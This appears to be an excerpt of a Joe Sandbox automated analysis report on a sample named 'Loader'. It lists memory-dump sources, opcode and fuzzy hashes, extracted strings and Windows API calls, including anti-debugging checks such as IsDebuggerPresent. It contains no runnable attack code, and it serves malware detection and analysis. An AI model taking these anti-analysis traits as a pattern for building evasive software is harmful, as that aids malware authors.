                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 254469556-0
                                                                                                                      • Opcode ID: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
                                                                                                                      • Instruction ID: 4001f41ba79e16392188d69e1115cfaa8756efc0bcb31323cfa97f730da242d5
                                                                                                                      • Opcode Fuzzy Hash: b39f09892c5069a8793f1adb4f26c6018a0cec7686a14d937c508cabda776516
                                                                                                                      • Instruction Fuzzy Hash: FF31F775D152199BDF20EFA4D9897CDBBB8BF18300F1041AAE40DAB290EB719B848F45
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *XJ{$>T\Z$])$aff{
                                                                                                                      • API String ID: 0-2222276473
                                                                                                                      • Opcode ID: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                      • Instruction ID: d33965fedcf3ec8bfaea6ee49b2b1930116d66db9d4f17549310b4a685dd9ed8
                                                                                                                      • Opcode Fuzzy Hash: 8ed444fac277c25db64a3c47ba10bfddbb1231e036786dedd629cc3a06cf1c87
                                                                                                                      • Instruction Fuzzy Hash: 2952E570604F818FD725CF36C4507A7BBE1AF96314F188A6DC4EB8B686C778A506CB61
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$gfff$gfff$gfff
                                                                                                                      • API String ID: 0-3742897846
                                                                                                                      • Opcode ID: 8cb0c85ab2aa89b0f8fbe9e11dafeed8b6e90a114adba7170f24e27e5439f530
                                                                                                                      • Instruction ID: 923f8d1e0d1fdb5aa2454058e77b70494cb0962b000f6e2f2ffbdacab0c5a947
                                                                                                                      • Opcode Fuzzy Hash: 8cb0c85ab2aa89b0f8fbe9e11dafeed8b6e90a114adba7170f24e27e5439f530
                                                                                                                      • Instruction Fuzzy Hash: B60290716097518FD718CE29C8907AABBE2AFD9304F08892DF4D9CB392D734D945CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00193272: __EH_prolog3_catch.LIBCMT ref: 00193279
                                                                                                                      • _Deallocate.LIBCONCRT ref: 00191EAD
                                                                                                                      • _Deallocate.LIBCONCRT ref: 00191EFA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Deallocate$H_prolog3_catch
                                                                                                                      • String ID: Current val: %d
                                                                                                                      • API String ID: 1212816977-1825967858
                                                                                                                      • Opcode ID: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
                                                                                                                      • Instruction ID: 3b5c54654b036e63f4fcd303ac846253f5ecae6d34260f7ff8eb6a838d6f613a
                                                                                                                      • Opcode Fuzzy Hash: a424b2a6da356b597d4bd61dfcba192187442aaaec6ea158ec1f9ce625af762b
                                                                                                                      • Instruction Fuzzy Hash: 4A61CC7251C3429FC721DF69D48026BFBE0AFD9724F140A2DF9D493242D735E9448B92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *&?$$7()&$mYZ$Ncq
                                                                                                                      • API String ID: 0-3297506359
                                                                                                                      • Opcode ID: e5dd2e3e2cd6302b14accdbc0867204686c8f3655a5c5960ca38aa80a062f07d
                                                                                                                      • Instruction ID: e8574adfe82d45d3babbcaef20d4f19ffed0c0d61f3b8f6cef08f9231ef99dae
                                                                                                                      • Opcode Fuzzy Hash: e5dd2e3e2cd6302b14accdbc0867204686c8f3655a5c5960ca38aa80a062f07d
                                                                                                                      • Instruction Fuzzy Hash: A181D5B4508B818BD325CF36C4907A7BBE1EF52304F18896CD4EF4B685D7396409CB55
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 001A5145: GetLastError.KERNEL32(?,00000000,0019FAAF,?,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A5149
                                                                                                                        • Part of subcall function 001A5145: SetLastError.KERNEL32(00000000,?,?,?,00000003,0019C1AB,?,?,?,?,00000000), ref: 001A51EB
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC7D7
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC821
                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001AC8E7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 661929714-0
                                                                                                                      • Opcode ID: f7af301647b52cdd3b4636152729d3622d34a0591f41ed671cac154c22cf7117
                                                                                                                      • Instruction ID: f737d61dfa56b9b0119d605013d803e79a1ad615db14e54e711059b1453f236d
                                                                                                                      • Opcode Fuzzy Hash: f7af301647b52cdd3b4636152729d3622d34a0591f41ed671cac154c22cf7117
                                                                                                                      • Instruction Fuzzy Hash: 3561C1795002079FEF289F28CC82BBAB3A9FF16314F10417AE905C6585EB38DD81DB90
                                                                                                                      APIs
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0019D2A7
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0019D2B1
                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0019D2BE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3906539128-0
                                                                                                                      • Opcode ID: 725576ab1f7cc9aac2ebd3c0aa346e6ea11bc7386be812e8909c0894c880f6b7
                                                                                                                      • Instruction ID: 72f2f4171ee0f2803015f74977448291bcd196aa8693a3ee81c56e696e3c942b
                                                                                                                      • Opcode Fuzzy Hash: 725576ab1f7cc9aac2ebd3c0aa346e6ea11bc7386be812e8909c0894c880f6b7
                                                                                                                      • Instruction Fuzzy Hash: 6731C574911218ABCF21DF68D9897CDBBB8BF18310F5041EAE41CA7290EB709F858F44
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: +$gfff$gfff
                                                                                                                      • API String ID: 0-3646763964
                                                                                                                      • Opcode ID: 3ffc56beea234f1ab54261763397f98ef3f6dd92bbd47de999464188f86deefc
                                                                                                                      • Instruction ID: e65a06cbc154e2811577ed8748148fa7f0c698b4f1253677319b0e8a8d446a28
                                                                                                                      • Opcode Fuzzy Hash: 3ffc56beea234f1ab54261763397f98ef3f6dd92bbd47de999464188f86deefc
                                                                                                                      • Instruction Fuzzy Hash: 8202807160C3918FC719CF29C49066AFBE2AFD9304F188A6DE8D987352D335D946CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NPFN$Yber$w
                                                                                                                      • API String ID: 0-2009834778
                                                                                                                      • Opcode ID: cac9b1dd26bfeec110c7d6f1e08a87e9c7bbbee78f555d126f6bfc88f6fe250c
                                                                                                                      • Instruction ID: cc71377278bbe94659da5a0bf6e5233a8df5dea9530c31499aebcff3a64f08c3
                                                                                                                      • Opcode Fuzzy Hash: cac9b1dd26bfeec110c7d6f1e08a87e9c7bbbee78f555d126f6bfc88f6fe250c
                                                                                                                      • Instruction Fuzzy Hash: 21E101B1A08340ABD314DF25D882BAFBBE5AFE5704F08892DF58993242D774D9098793
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: -$gfff$gfff
                                                                                                                      • API String ID: 0-837351935
                                                                                                                      • Opcode ID: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                      • Instruction ID: 0d6469e7f3558ec0a1afa8767c5f886d104c6ae322f0946e7eb09595f68809a9
                                                                                                                      • Opcode Fuzzy Hash: 2b246fee1e96ab77cbfea3b02b5951998acea595ba4b8d542442ccafe6eddf1f
                                                                                                                      • Instruction Fuzzy Hash: C4D1AE7560C3918FC719CF28C49066AFBE1AFE9304F188A6DE8D987352D335D949CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D$T$pq
                                                                                                                      • API String ID: 0-1650208392
                                                                                                                      • Opcode ID: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
                                                                                                                      • Instruction ID: b834e28bc26262ee4220b59ae42cd460afc09c9fd3a5806d5e6b64393f1cc3d6
                                                                                                                      • Opcode Fuzzy Hash: 179ced83c93506f93868ebb32039e1a034d70eca660c4b6b59c32d5282ddd536
                                                                                                                      • Instruction Fuzzy Hash: 93C1BBB160C3848FE710DF25D881B5BBBE6EBD1314F18882CE1C49B352DB35C90A8B96
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: + 47$.$'|H
                                                                                                                      • API String ID: 0-109567950
                                                                                                                      • Opcode ID: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
                                                                                                                      • Instruction ID: c0dd302c5e0655953556dd9a0b584eb9c724fb80c248a436ee8770e4a7b11971
                                                                                                                      • Opcode Fuzzy Hash: 54ebea9f41e9dbb84324b087273c464a07e3396ba849ab18214a3e9178a1a45c
                                                                                                                      • Instruction Fuzzy Hash: 80A1F47151C7918FD3158F29C49075BBFE1AFA6314F18896CE8D59B382C779C809CB92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ;/*$.L6l$dxT3
                                                                                                                      • API String ID: 0-2401999623
                                                                                                                      • Opcode ID: 9e77fbb4471a8027105352b42f26c5cf2fd319c44dc2b268aa6f88fe23aaabc7
                                                                                                                      • Instruction ID: 147e4e8f35a77888777b2d35e6cbebca71966094bec69298d73f4feeb9107ef1
                                                                                                                      • Opcode Fuzzy Hash: 9e77fbb4471a8027105352b42f26c5cf2fd319c44dc2b268aa6f88fe23aaabc7
                                                                                                                      • Instruction Fuzzy Hash: 8391E474604B808FE335CB3AC4657A7BBE1AF53304F18896DD5EB8B282D779A406CB51
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 71130d6100ede6563424b8a4d7df45df7381647f619140e561abbae099e1f578
                                                                                                                      • Instruction ID: 9bb88926932e37ee5298ec822c8a03e81cf0354fa835d4e57c915f1c202aec9b
                                                                                                                      • Opcode Fuzzy Hash: 71130d6100ede6563424b8a4d7df45df7381647f619140e561abbae099e1f578
                                                                                                                      • Instruction Fuzzy Hash: F1F10D71E00219AFDF14CFA9C890AADB7B1EF49314F15826DE915EB391D730AD468B90
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*+($%*+(
                                                                                                                      • API String ID: 0-3039692684
                                                                                                                      • Opcode ID: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
                                                                                                                      • Instruction ID: abc95666b1901b47be3c5f48afddc7401bfb4d2451ae86c7b510c8baeead6f71
                                                                                                                      • Opcode Fuzzy Hash: c0c64b1f1a311242f5653ae87034764490023d811ee37297f05c80f2601e4e2f
                                                                                                                      • Instruction Fuzzy Hash: CE12BD702087819BE735CF56DC41BAFB7E2FBC8740F14892CE6899B291E771A841CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %*+($f
                                                                                                                      • API String ID: 0-2038831151
                                                                                                                      • Opcode ID: 110a5ef49e9f0dda32428eb62bfb9db942ad63d1b2837951dfcae4362f03bc3c
                                                                                                                      • Instruction ID: 1d6bfc6699a115915b5536241987ab9266bc7a2dd65c1c564a910233cf596411
                                                                                                                      • Opcode Fuzzy Hash: 110a5ef49e9f0dda32428eb62bfb9db942ad63d1b2837951dfcae4362f03bc3c
                                                                                                                      • Instruction Fuzzy Hash: 0412AC716083459FC714CF18C890A2BBBE2BFC5314F188A2DF6958B3A2D7B5D946CB52
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178615808.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178640844.0000000000215000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178663529.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_190000_Loader.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$IEND
                                                                                                                      • API String ID: 0-707183367
                                                                                                                      • Opcode ID: 60aa286231864026a4360cbbcdb69e3dea2ab465c2c993e02c08dd386b771a1a
                                                                                                                      • Instruction ID: 0fb19903763300635933adc036978006a7c4f19c75341b440ee09df31da8f851
                                                                                                                      • Opcode Fuzzy Hash: 60aa286231864026a4360cbbcdb69e3dea2ab465c2c993e02c08dd386b771a1a
                                                                                                                      • Instruction Fuzzy Hash: CDE1D071A087519FE310CF28C885B1AFBE0BFA4318F15492DE9999B382D775E815CBD2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2178579174.00000000001BE000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2178510148.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178530269.0000000000191000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2178560198.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
